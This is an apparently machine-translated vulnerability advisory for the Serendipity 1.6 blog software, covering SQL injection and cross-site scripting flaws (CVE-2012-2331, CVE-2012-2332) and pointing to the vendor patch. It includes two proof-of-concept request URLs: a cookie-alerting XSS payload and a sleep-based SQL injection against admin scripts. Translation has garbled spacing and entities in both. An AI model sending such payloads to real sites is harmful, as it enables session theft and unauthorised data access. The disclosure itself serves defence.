Release date:
Updated on:
Affected Systems:
Serendipity 1.6
Unaffected system:
Serendipity 1.6.1
Description:
--------------------------------------------------------------------------------
Bugtraq id: 53418
Cve id: CVE-2012-2331, CVE-2012-2332
Serendipity is a blog/CMS application written in PHP.
The implementation of Serendipity 1.6 and other versions has the SQL injection and cross-site scripting vulnerabilities, successful exploitation of these vulnerabilities allows attackers to run malicious script code, steal Cookie authentication creden。, control applications, access or modify data.
<* Source: Stefan Schurtz
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Cross Site-Scripting:
Http://www.example.com/serendipity/serendipity_admin_image_selector.php? Serendipity [textarea] = '"& lt;/script & gt; & lt; script & gt; alert (document. cookie) & lt;/script & gt;
SQL-Injection:
Http://www.example.com/serendipity/serendipity_admin.php? Serendipity [adminModule] = plugins & amp; serendipity [plugin_to_conf] =-1 'or sleep (10) = 0 LIMIT 1 -- +
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Serendipity
-----------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
Http://www.s9y.org/12.html